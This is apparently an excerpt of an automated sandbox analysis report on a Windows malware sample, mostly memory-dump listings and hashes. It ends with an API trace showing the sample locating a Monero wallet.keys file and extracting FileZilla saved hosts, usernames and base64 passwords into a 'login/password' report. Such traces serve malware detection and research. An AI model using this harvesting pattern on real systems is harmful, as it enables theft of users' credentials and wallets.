                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction ID: 3903fa9b2f49c99d7a82117b72e3337399d727d6f01c19d8982e413e94bbe4d9
                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction Fuzzy Hash: D7A13D72A04A19CBEB19CF55CCC1A9EBBB1FB58314F18D22AD41AE73A4D334A944CF50
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction ID: 4fc6bc8f484443fac14b2605fb01bae2f067ff1d1c33e2283fe5ff5fc6a07b89
                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction Fuzzy Hash: 61A16FB2A083119BD308CF25C89075FF7E2EFC8710F5ACA3DA89997254D774E9419B82
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9711d9017fe080c3ab02dd0f2f595f045e03ee828f111d303e8556a1b9a5e5d
                            • Instruction ID: 35eb8953cfe0374103fbb7ff511cc7aead73e6fbc98f2bc8f15600c05887803f
                            • Opcode Fuzzy Hash: a9711d9017fe080c3ab02dd0f2f595f045e03ee828f111d303e8556a1b9a5e5d
                            • Instruction Fuzzy Hash: 30614AF3A08218AFE704AE29EC4567BBBE4DB54360F160A3DEAC4C3340F97598048696
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5230f2fc8a66c4636979e18ca6eb617980395f54d9712b1cb8b8e619abe63b72
                            • Instruction ID: d5ac837172c3ab8b557b9029f806a6084ff6707c182231258ecedcb745081159
                            • Opcode Fuzzy Hash: 5230f2fc8a66c4636979e18ca6eb617980395f54d9712b1cb8b8e619abe63b72
                            • Instruction Fuzzy Hash: 48518EB3E082205FF3089969EC94726B6CAD7D4760F2B863DEE98973C4ED395C0542C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36e1c991017454d013c7941a4c1ec543684ef1bea81ce224481522c2e4464fc1
                            • Instruction ID: d6c04c6cfeb2792f1ed2a529a407fc6884725570afd4a32422457b77aff1eb15
                            • Opcode Fuzzy Hash: 36e1c991017454d013c7941a4c1ec543684ef1bea81ce224481522c2e4464fc1
                            • Instruction Fuzzy Hash: 8E5159F3B082105FE344AE2CEC9576BB7D5EB94320F1A853CEAC5C7748E97598058683
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ba5b3fa76d0f288e306c610b2c902f40b3934f6acf6d8b2d6d2f0d1ff34bc90
                            • Instruction ID: 2e1f745b93fe0f2bd4bc3d82cc76a0eaf7ada7117d0af250271c345cef47adb3
                            • Opcode Fuzzy Hash: 6ba5b3fa76d0f288e306c610b2c902f40b3934f6acf6d8b2d6d2f0d1ff34bc90
                            • Instruction Fuzzy Hash: FE51D4F3E142104BF3185928DC8536AB6D6EB80320F1B453DDE98D7784D97D9D0A87C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb1a0568d2dfd53c600b5ba170709c72c9f95dd174060f9f4f8f13503ea4a96b
                            • Instruction ID: fe32f9331050c11b433c9bd384ca0596221374d5bc30c8c56d77b0cd6c2af5c6
                            • Opcode Fuzzy Hash: bb1a0568d2dfd53c600b5ba170709c72c9f95dd174060f9f4f8f13503ea4a96b
                            • Instruction Fuzzy Hash: 8D4170B651C200EFE705AE55E981ABEF7F9EF84724F15882EF6C4C6610D33448448B67
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction ID: 19d487a3a54cc3ffd0704c7b8ff301de05b3163ce63fcb16e80afecb80cfcd13
                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction Fuzzy Hash: F3514C62E09BD985C7058B7544502EEBFB21FE6214F2E829EC4982F383C3759689D3E5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4eea5a1221997257fccfb423d03184ade5bc852d13fd38deb10f853b0c973a28
                            • Instruction ID: a32159bec11f4fdcd9a8c18449fa92bfbf3a0cd35be06591635b69aa653d0a6b
                            • Opcode Fuzzy Hash: 4eea5a1221997257fccfb423d03184ade5bc852d13fd38deb10f853b0c973a28
                            • Instruction Fuzzy Hash: A321F5B251C6149FE311BF29D881AAEFBE4FF58360F06482DEAD893610D7319840CB97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00E60DBF,00E60DBE,00E60DBB,00E60DBA), ref: 00E504C2
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E504C9
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E504E5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E504F3
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E5052F
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E5053D
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00E50579
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E50587
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E505C3
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E505D5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E50662
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E5067A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E50692
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E506AA
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E506C2
                            • lstrcat.KERNEL32(?,profile: null), ref: 00E506D1
                            • lstrcat.KERNEL32(?,url: ), ref: 00E506E0
                            • lstrcat.KERNEL32(?,00000000), ref: 00E506F3
                            • lstrcat.KERNEL32(?,00E61770), ref: 00E50702
                            • lstrcat.KERNEL32(?,00000000), ref: 00E50715
                            • lstrcat.KERNEL32(?,00E61774), ref: 00E50724
                            • lstrcat.KERNEL32(?,login: ), ref: 00E50733
                            • lstrcat.KERNEL32(?,00000000), ref: 00E50746
                            • lstrcat.KERNEL32(?,00E61780), ref: 00E50755
                            • lstrcat.KERNEL32(?,password: ), ref: 00E50764
                            • lstrcat.KERNEL32(?,00000000), ref: 00E50777
                            • lstrcat.KERNEL32(?,00E61790), ref: 00E50786
                            • lstrcat.KERNEL32(?,00E61794), ref: 00E50795
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E507EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
